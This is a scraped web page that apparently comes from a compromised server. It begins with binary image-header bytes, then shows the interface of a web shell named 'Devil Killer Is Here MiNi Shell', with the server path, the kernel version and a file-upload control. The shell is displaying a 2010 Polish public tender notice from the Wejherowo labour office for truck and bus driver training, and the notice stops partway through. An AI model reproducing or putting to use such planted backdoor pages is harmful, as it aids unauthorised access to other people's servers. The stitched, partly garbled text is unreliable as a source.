JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100715/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100715/210814-N-2010.html

<p class="kh_header"><b>Wejherowo: Wykonanie usługi - szkolenia grupowe dla osób bezrobotnych - Kwalifikacja wstępna</b><br>
<b>Numer ogłoszenia: 210814 - 2010; data zamieszczenia: 15.07.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Wejherowie , ul. I Brygady Pancernej Wojska Polskiego 32, 84-200 Wejherowo, woj. pomorskie, tel. 0-58 6776300, 6776327, faks 0-58 6776327.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupwejherowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi - szkolenia grupowe dla osób bezrobotnych - Kwalifikacja wstępna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego postępowania jest zorganizowanie i przeprowadzenie następujących usług szkoleniowych:

CZĘŚĆ I
1. Przedmiotem zamówienia jest wykonanie szkolenia grupowego dla 65 osób bezrobotnych w zakresie KWALIFIKACJA WSTĘPNA NA PRZEWÓZ RZECZY realizowane w dwóch formach:
a. Kwalifikacja wstępna pełna na przewóz rzeczy,
b. Kwalifikacja wstępna przyspieszona na przewóz rzeczy.
Szkolenie będzie finansowane z  Fundusz Pracy i Europejskiego Funduszu Społecznego.
2. Program szkolenia winien być zgodny z :
a. Ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz. U. z 2007r. Nr 125, poz. 874 z późn. zm.),
b. Ustawą z dnia 12 lutego 2010r. o zmianie ustawy o transporcie drogowym oraz 
o zmianie niektórych innych ustaw (Dz. U. z 2010r. Nr 43, poz. 246), 
c. Rozporządzeniem Ministra Infrastruktury z dnia 1 kwietnia 2010r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. z 2010r. Nr 53, poz. 314)
d. Rozporządzeniem Ministra Infrastruktury z dnia 10 kwietnia 2008r. w sprawie wymagań dotyczących prowadzenia ośrodka doskonalenia techniki jazdy, egzaminowania kandydatów na instruktorów techniki jazdy, postępowania 
z dokumentacją związaną z prowadzeniem szkoleń oraz wzorów stosowanych dokumentów (Dz. U. z 2008, Nr 77, poz. 458).
Ponadto program winien być zgodny z krajowymi standardami kwalifikacji zawodowych i modułowych programów szkolenia zawodowego znajdującymi się w internetowej bazie danych, znajdującej się na serwerze Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl.
3. Liczba osób objętych szkoleniem - 65.
4. Szkolenie zostanie przeprowadzone w sześciu grupach szkoleniowych w następujących wielkościach:
a. 10 osób - 5 grup szkoleniowych,
b. 15 osób - 1 grupa szkoleniowa.
5. Liczba godzin szkolenia:
a. Ogółem 280 godzin zegarowych na każdego uczestnika szkolenia Kwalifikacja wstępna pełna na przewóz rzeczy, w tym:
- część podstawowa - teoretyczna - 195 godzin zegarowych,
- część specjalistyczna - teoretyczna - 65 godzin zegarowych,
- zajęcia praktyczne (jazda w ruchu drogowym) - 16 godzin zegarowych,
- zajęcia praktyczne (jazda w warunkach specjalnych) - 4 godziny zegarowe.
b. Ogółem 140 godzin zegarowych na każdego uczestnika szkolenia Kwalifikacja wstępna przyspieszona na przewóz rzeczy, w tym:
- część podstawowa - teoretyczna - 97 godzin zegarowych,
- część specjalistyczna - teoretyczna - 33 godziny zegarowych,
- zajęcia praktyczne (jazda w ruchu drogowym) - 8 godzin zegarowych,
- zajęcia praktyczne (jazda w warunkach specjalnych) - 2 godziny zegarowe.
6. Termin realizacji zamówienia: sierpień - grudzień 2010 r. - w miesiącu nie więcej niż dwie grupy szkoleniowe.
7. Planowany termin rozpoczęcia szkolenia maksymalnie 10 dni od wyboru najkorzystniejszej oferty po podpisaniu umowy (pod warunkiem, że nie zajdą inne okoliczności powodujące zmianę terminu rozpoczęcia szkolenia np. odwołanie itp.).
8. Kandydaci na szkolenie zostaną wyłonieni przez Zamawiającego. Wykonawcy wyłonionemu w drodze przetargu nieograniczonego, po podpisaniu umowy przed terminem rozpoczęcia zajęć danej grupy szkoleniowej, będzie przekazana lista osób zakwalifikowanych do szkolenia.
9. Uczestnicy szkolenia muszą zostać wyposażeni w obowiązkowe materiały szkoleniowe w postaci:
a. płyta CD- zawierająca materiały edukacyjne,
b. długopis,
c. notatnik
d. identyfikator,
e. podręcznik lub inną literaturę z zakresu tematyki objętej programem szkolenia,
Wymienione powyżej materiały każdy uczestnik szkolenia otrzyma na własność.
Materiały te należy uwzględnić w kalkulacji kosztów szkolenia.
Odbiór materiałów musi zostać pokwitowany przez uczestników szkolenia 
(na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć).
10. Wykonawca zapewnia każdemu uczestnikowi szkolenia posiłek regeneracyjny (poczęstunek - napoje ciepłe, napoje chłodzące, jeden posiłek ciepły - obiad oraz miejsce i możliwość spożycia posiłku) w każdym dniu realizacji szkolenia. Koszt niniejszych posiłków należy uwzględnić w kalkulacji kosztów szkolenia.
11. Materiały szkoleniowe przekazywane nieodpłatnie każdemu uczestnikowi szkolenia muszą być:
a. adekwatne do treści szkolenia oraz dobre jakościowo;
b. na stronie tytułowej:
- oznakowane zgodnie z Załącznikiem nr 10 w przypadku uczestnika szkolenia finansowanego z Funduszu Pracy. 
- oznakowane zgodnie z Załącznikiem nr 11 w przypadku uczestnika szkolenia finansowanego z Europejskiego Funduszu Społecznego.
c. na każdej stronie:
- oznakowane logiem PUP w przypadku uczestnika szkolenia finansowanego 
z Funduszu Pracy. 
- oznakowane logiem EFS w przypadku uczestnika szkolenia finansowanego 
z Europejskiego Funduszu Społecznego.
Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki stanowi Załącznik nr 12 do SIWZ.
12. Zagadnienia powinny być szczegółowo rozpisane w programie szkoleń, określające temat zajęć edukacyjnych.
13. Wymaga się, aby szkolenie trwało w tygodniu przeciętnie nie mniej niż 30 godzin zegarowych zgodnie z art. 40 ust. 4 ustawy o promocji zatrudnienia i instytucjach rynku pracy z dnia 20 kwietnia 2004 r. (Dz. U. z 2008 r. Nr 69, poz. 415 ze zm.). 
Godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 
45 minut oraz przerwę liczącą średnio 15 minut, długość przerw może być ustalana 
w sposób elastyczny.
14. Ze względu na długotrwały okres szkolenia i jego specyfikę zajęcia mogą się odbywać w godzinach ustalonych z uczestnikami we wszystkie dni tygodnia z zachowaniem warunku trwania szkolenia teoretycznego, który nie może przekroczyć 8 godzin dziennie.
15. Szkolenie powinno mieć opiekuna z ramienia Wykonawcy czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
16. Lokal, w którym będą przeprowadzane zajęcia teoretyczne powinien być przestronny i przewiewny, posiadać dostęp do pomieszczeń sanitarnych oraz winien gwarantować w trakcie szkolenia wymogi bezpieczeństwa i higieny pracy w tym zakresie. Ponadto powinien być wyposażony w pomoce dydaktyczne i sprzęt dostosowane do prowadzenia szkoleń będących przedmiotem zamówienia.
Wyposażenie dydaktyczne i warunki dotyczące posiadania infrastruktury obiektu szkoleniowego zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 10 kwietnia 2008r. w sprawie wymagań dotyczących prowadzenia ośrodka doskonalenia techniki jazdy, egzaminowania kandydatów na instruktorów techniki jazdy, postępowania z dokumentacją związaną z prowadzeniem szkoleń oraz wzorów stosowanych dokumentów (Dz. U. z 2008, Nr 77, poz. 458).
17. Miejscem wykonania zamówienia ze względu na specyfikę szkolenia jest województwo pomorskie. W przypadku zajęć na specjalistycznych placach manewrowych (jazda w warunkach specjalnych) dopuszcza się organizację zajęć poza obszarem województwa pomorskiego, a koszty związane z organizacją tych zajęć muszą zostać ujęte w szczegółowej kalkulacji kosztów (zakwaterowanie, wyżywienie i transport uczestników szkolenia do miejsca organizowanych zajęć). 
18. Szkolenie winno być przeprowadzone zgodnie z programem szkolenia oraz przedstawionym harmonogramem uwzględniającym godzinowy podział zajęć 
w ujęciu tygodniowym.
19. Po zakończeniu szkolenia w celu ocenienia jakości zrealizowanej usługi Wykonawca przekaże uczestnikom szkolenia do wypełnienia ankietę, stanowiącą Załącznik nr 9 do SIWZ.
20. Szkolenie zakończy się:
a. egzaminem wewnętrznym (testowym) sprawdzającym stopień przyswojenia przez uczestników wiadomości objętych szkoleniem,
b. egzaminem państwowym przed komisją powołaną przez odpowiedniego wojewodę, którego koszt musi zostać ujęty w szczegółowej kalkulacji kosztów.
21. Wykonawca wystawi odpowiednie oświadczenie o ukończeniu szkolenia każdemu uczestnikowi szkolenia. Ponadto dostarczy Zamawiającemu kopie zaświadczeń (o otrzymanych uprawnieniach) otrzymanych przez uczestników szkolenia wystawionych przez właściwego wojewodę.
22. Zamawiający dokona jednorazowo zapłaty za przeprowadzone szkolenie, po dostarczeniu przez Wykonawcę zaświadczeń o pozytywnym ukończeniu szkolenia przez uczestników. Ponadto Wykonawca obejmuje organizację egzaminów dla osób, które ukończą szkolenie. Na Wykonawcy będzie spoczywał obowiązek uregulowania wszystkich spraw związanych z egzaminem państwowym przed komisją powołaną przez właściwego wojewodę.
23. Zajęcia powinny być prowadzone przez wykładowców, którzy posiadają do tego celu wymagane uprawnienia potwierdzone odpowiednimi dokumentami a ich kopie zostaną załączone do oferty.

CZĘŚĆ II
1. Przedmiotem zamówienia jest wykonanie szkolenia grupowego dla 35 osób bezrobotnych w zakresie KWALIFIKACJA WSTĘPNA NA PRZEWÓZ OSÓB realizowane w dwóch formach:
a. Kwalifikacja wstępna pełna na przewóz osób,
b. Kwalifikacja wstępna przyspieszona na przewóz osób.
Szkolenie będzie finansowane z  Fundusz Pracy i Europejskiego Funduszu Społecznego.
2. Program szkolenia winien być zgodny z :
a. Ustawą z dnia 6 września 2001r. o transporcie drogowym (Dz. U. z 2007r. Nr 125, poz. 874 z późn. zm.),
b. Ustawą z dnia 12 lutego 2010r. o zmianie ustawy o transporcie drogowym oraz 
o zmianie niektórych innych ustaw (Dz. U. z 2010r. Nr 43, poz. 246), 
c. Rozporządzeniem Ministra Infrastruktury z dnia 1 kwietnia 2010r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. z 2010r. Nr 53, poz. 314)
d. Rozporządzeniem Ministra Infrastruktury z dnia 10 kwietnia 2008r. w sprawie wymagań dotyczących prowadzenia ośrodka doskonalenia techniki jazdy, egzaminowania kandydatów na instruktorów techniki jazdy, postępowania 
z dokumentacją związaną z prowadzeniem szkoleń oraz wzorów stosowanych dokumentów (Dz. U. z 2008, Nr 77, poz. 458).
Ponadto program winien być zgodny z krajowymi standardami kwalifikacji zawodowych i modułowych programów szkolenia zawodowego znajdującymi się w internetowej bazie danych, znajdującej się na serwerze Ministerstwa Pracy i Polityki Społecznej www.standardyiszkolenia.praca.gov.pl.
3. Liczba osób objętych szkoleniem - 35.
4. Szkolenie zostanie przeprowadzone w trzech grupach szkoleniowych w następujących wielkościach:
a. 10 osób - 2 grupy szkoleniowe,
b. 15 osób - 1 grupa szkoleniowa.
5. Liczba godzin szkolenia:
a. Ogółem 280 godzin zegarowych na każdego uczestnika szkolenia Kwalifikacja wstępna pełna na przewóz osób, w tym:
- część podstawowa - teoretyczna - 195 godzin zegarowych,
- część specjalistyczna - teoretyczna - 65 godzin zegarowych,
- zajęcia praktyczne (jazda w ruchu drogowym) - 16 godzin zegarowych,
- zajęcia praktyczne (jazda w warunkach specjalnych) - 4 godziny zegarowe.
b. Ogółem 140 godzin zegarowych na każdego uczestnika szkolenia Kwalifikacja wstępna przyspieszona na przewóz osób, w tym:
- część podstawowa - teoretyczna - 97 godzin zegarowych,
- część specjalistyczna - teoretyczna - 33 godziny zegarowych,
- zajęcia praktyczne (jazda w ruchu drogowym) - 8 godzin zegarowych,
- zajęcia praktyczne (jazda w warunkach specjalnych) - 2 godziny zegarowe.
6. Termin realizacji zamówienia: sierpień - grudzień  2010 r. - w miesiącu nie więcej niż dwie grupy szkoleniowe.
7. Planowany termin rozpoczęcia szkolenia maksymalnie 10 dni od wyboru najkorzystniejszej oferty po podpisaniu umowy (pod warunkiem, że nie zajdą inne okoliczności powodujące zmianę terminu rozpoczęcia szkolenia np. odwołanie itp.).
8. Kandydaci na szkolenie zostaną wyłonieni przez Zamawiającego. Wykonawcy wyłonionemu w drodze przetargu nieograniczonego, po podpisaniu umowy przed terminem rozpoczęcia zajęć danej grupy szkoleniowej, będzie przekazana lista osób zakwalifikowanych do szkolenia.
9. Uczestnicy szkolenia muszą zostać wyposażeni w obowiązkowe materiały szkoleniowe w postaci:
a. płyta CD- zawierająca materiały edukacyjne,
b. długopis,
c. notatnik
d. identyfikator,
e. podręcznik lub inną literaturę z zakresu tematyki objętej programem szkolenia,
Wymienione powyżej materiały każdy uczestnik szkolenia otrzyma na własność.
Materiały te należy uwzględnić w kalkulacji kosztów szkolenia.
Odbiór materiałów musi zostać pokwitowany przez uczestników szkolenia 
(na początku szkolenia bądź na bieżąco zgodnie z realizowanym tematem zajęć).
10. Wykonawca zapewnia każdemu uczestnikowi szkolenia posiłek regeneracyjny 
(poczęstunek - napoje ciepłe, napoje chłodzące, jeden posiłek ciepły - obiad oraz miejsce i możliwość spożycia posiłku) w każdym dniu realizacji szkolenia. Koszt niniejszych posiłków należy uwzględnić w kalkulacji kosztów szkolenia.
11. Materiały szkoleniowe przekazywane nieodpłatnie każdemu uczestnikowi szkolenia muszą być:
a. adekwatne do treści szkolenia oraz dobre jakościowo;
b. na stronie tytułowej:
- oznakowane zgodnie z Załącznikiem nr 10 w przypadku uczestnika szkolenia finansowanego z Funduszu Pracy. 
- oznakowane zgodnie z Załącznikiem nr 11 w przypadku uczestnika szkolenia finansowanego z Europejskiego Funduszu Społecznego.
c. na każdej stronie:
- oznakowane logiem PUP w przypadku uczestnika szkolenia finansowanego 
z Funduszu Pracy. 
- oznakowane logiem EFS w przypadku uczestnika szkolenia finansowanego 
z Europejskiego Funduszu Społecznego.
Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki stanowi Załącznik nr 12 do SIWZ.
12. Zagadnienia powinny być szczegółowo rozpisane w programie szkoleń, określające temat zajęć edukacyjnych.
13. Wymaga się, aby szkolenie trwało w tygodniu przeciętnie nie mniej niż 30 godzin zegarowych zgodnie z art. 40 ust. 4 ustawy o promocji zatrudnienia i instytucjach rynku pracy z dnia 20 kwietnia 2004 r. (Dz. U. z 2008 r. Nr 69, poz. 415 ze zm.). 
Godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 
45 minut oraz przerwę liczącą średnio 15 minut, długość przerw może być ustalana 
w sposób elastyczny.
14. Ze względu na długotrwały okres szkolenia i jego specyfikę zajęcia mogą się odbywać w godzinach ustalonych z uczestnikami we wszystkie dni tygodnia z zachowaniem warunku trwania szkolenia teoretycznego, który nie może przekroczyć 8 godzin dziennie.
15. Szkolenie powinno mieć opiekuna z ramienia Wykonawcy czyli osobę odpowiedzialną za organizację szkolenia, wskazaną do kontaktu z uczestnikami szkolenia oraz Zamawiającym.
16. Lokal, w którym będą przeprowadzane zajęcia teoretyczne powinien być przestronny i przewiewny, posiadać dostęp do pomieszczeń sanitarnych oraz winien gwarantować w trakcie szkolenia wymogi bezpieczeństwa i higieny pracy w tym zakresie. Ponadto powinien być wyposażony w pomoce dydaktyczne i sprzęt dostosowane do prowadzenia szkoleń będących przedmiotem zamówienia.
Wyposażenie dydaktyczne i warunki dotyczące posiadania infrastruktury obiektu szkoleniowego zgodne z Rozporządzeniem Ministra Infrastruktury z dnia 10 kwietnia 2008r. w sprawie wymagań dotyczących prowadzenia ośrodka doskonalenia techniki jazdy, egzaminowania kandydatów na instruktorów techniki jazdy, postępowania z dokumentacją związaną z prowadzeniem szkoleń oraz wzorów stosowanych dokumentów (Dz. U. z 2008, Nr 77, poz. 458).
17. Miejscem wykonania zamówienia ze względu na specyfikę szkolenia jest województwo pomorskie. W przypadku zajęć na specjalistycznych placach manewrowych (jazda w warunkach specjalnych) dopuszcza się organizację zajęć poza obszarem województwa pomorskiego, a koszty związane z organizacją tych zajęć muszą zostać ujęte w szczegółowej kalkulacji kosztów (zakwaterowanie, wyżywienie i transport uczestników szkolenia do miejsca organizowanych zajęć).
18. Szkolenie winno być przeprowadzone zgodnie z programem szkolenia oraz przedstawionym harmonogramem uwzględniającym godzinowy podział zajęć 
w ujęciu tygodniowym.
19. Po zakończeniu szkolenia w celu ocenienia jakości zrealizowanej usługi Wykonawca przekaże uczestnikom szkolenia do wypełnienia ankietę, stanowiącą Załącznik nr 9 do SIWZ.
20. Szkolenie zakończy się:
a. egzaminem wewnętrznym (testowym) sprawdzającym stopień przyswojenia przez uczestników wiadomości objętych szkoleniem,
b. egzaminem państwowym przed komisją powołaną przez odpowiedniego wojewodę, którego koszt musi zostać ujęty w szczegółowej kalkulacji kosztów.
21. Wykonawca wystawi odpowiednie oświadczenie o ukończeniu szkolenia każdemu uczestnikowi szkolenia. Ponadto dostarczy Zamawiającemu kopie zaświadczeń (o otrzymanych uprawnieniach) otrzymanych przez uczestników szkolenia wystawionych przez właściwego wojewodę.
22. Zamawiający dokona jednorazowo zapłaty za przeprowadzone szkolenie, po dostarczeniu przez Wykonawcę zaświadczeń o pozytywnym ukończeniu szkolenia przez uczestników. Ponadto Wykonawca obejmuje organizację egzaminów dla osób, które ukończą szkolenie. Na Wykonawcy będzie spoczywał obowiązek uregulowania wszystkich spraw związanych z egzaminem państwowym przed komisją powołaną przez właściwego wojewodę.
23. Zajęcia powinny być prowadzone przez wykładowców, którzy posiadają do tego celu wymagane uprawnienia potwierdzone odpowiednimi dokumentami a ich kopie zostaną załączone do oferty..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamowienia uzupełniającego do 50% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie spełniania warunku nastąpi poprzez złożenie Załącznika nr 3 do SIWZ. Ocena spełnienia warunku zostanie dokonana metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie spełniania warunku nastąpi poprzez złożenie Załącznika nr 3 do SIWZ oraz złożenie wraz z ofertą wykazu wykonanych usług w okresie ostatnich trzech lat w zakresie objętym specyfikacją. Ocena spełnienia warunku zostanie dokonana metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie spełniania warunku nastąpi poprzez złożenie Załącznika nr 3 do SIWZ. Ocena spełnienia warunku zostanie dokonana metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie spełniania warunku nastąpi poprzez złożenie Załącznika nr 3 do SIWZ oraz złożenie wraz z ofertą wykazu osób - kadry dydaktycznej, która będzie uczestniczyć w wykonywaniu zamówienia. Ocena spełnienia warunku zostanie dokonana metodą spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie spełniania warunku nastąpi poprzez złożenie Załącznika nr 3 do SIWZ. Ocena spełnienia warunku zostanie dokonana metodą spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

